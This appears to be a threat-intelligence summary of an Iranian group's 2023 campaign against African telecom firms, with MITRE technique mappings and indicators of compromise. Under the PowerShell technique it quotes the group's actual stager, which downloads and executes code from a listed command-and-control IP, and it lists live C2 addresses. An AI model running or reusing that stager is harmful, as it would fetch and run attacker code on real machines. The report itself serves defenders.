Seedworm, an Iranian cyberespionage group, targeted telecommunications organizations in Egypt, Sudan, and Tanzania in a November 2023 campaign. The operation used MuddyC2Go and a mix of living-off-the-land tools (including SimpleHelp, Venom Proxy, and AnyDesk) along with PowerShell to establish and maintain command-and-control and persistence.
#Seedworm #MuddyC2Go
#Seedworm #MuddyC2Go
Keypoints
- Seedworm targeted telecom organizations in Egypt, Sudan, and Tanzania during a November 2023 operation.
- The attackers sideloaded MuddyC2Go via jabswitch.exe, with the C2 URL read from the Windows registry.
- The toolset includes SimpleHelp, Venom Proxy, AnyDesk, a custom keylogger, and PowerShell-based stagers.
- The attack chain features a MuddyC2Go PowerShell loader, scheduled task execution, and Impacket WMIExec usage.
- Prior intrusions in 2023 show extensive SimpleHelp activity (PowerShell, proxy tools, SAM hive dumping, WMI, JumpCloud) attributed to Seedworm.
- MuddyC2Go represents an evolution with new C2 infrastructure, embedded PowerShell, and Go-based components linked to Seedworm, with Stark Industries hosting observed C2 servers.
MITRE Techniques
- [T1059.001] PowerShell – The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server: ‘tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp=”tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp”;$uri =”http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf”;$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;’
- [T1574.002] DLL side-loading – The MuddyC2Go launcher named ‘vcruntime140.dll’ was saved in the folder ‘csidl_common_appdatajavax’, sideloaded by jabswitch.exe.
- [T1012] Query Registry – The malware reads the C&C URL from the Windows registry value ‘End’ stored inside the key ‘HKLMSYSTEMCurrentControlSetServicesTcpip’. The URL path is read from the ‘Status’ value in the same key.
- [T1053.005] Scheduled Task – The MuddyC2Go launcher executed via a scheduled task that had previously been created.
- [T1047] Windows Management Instrumentation – The attackers used Impacket WMIExec hacktool to execute commands on the remote system.
- [T1021] Remote Services – The SimpleHelp remote access tool was leveraged, connecting to the 146.70.124[.]102 C&C server; AnyDesk was also deployed on the same machine.
- [T1056.001] Keylogging – A custom keylogging tool was used as part of the payload.
- [T1003] OS Credential Dumping – Prior activity included dumping SAM hives and related credential access activity.
Indicators of Compromise
-
File Indicators
- [File] 1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca – MuddyC2Go DLL launcher
- [File] 25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM) Platform SE 8 executable used for sideloading MuddyC2Go DLL
- [File] eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger
- [File] 3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy
-
Network Indicators
- [Network] 146.70.124[.]102 – SimpleHelp C&C server
- [Network] 94.131.109[.]65 – MuddyC2Go C&C server
- [Network] 95.164.38[.]99 – MuddyC2Go C&C server
- [Network] 45.67.230[.]91 – MuddyC2Go C&C server
- [Network] 45.150.64(.)39 – MuddyC2Go C&C server
- [Network] 95.164.46[.]199 – MuddyC2Go C&C server
- [Network] 94.131.98[.]14 – MuddyC2Go C&C server
- [Network] 94.131.3[.]160 – GoSOCKS5proxy C&C server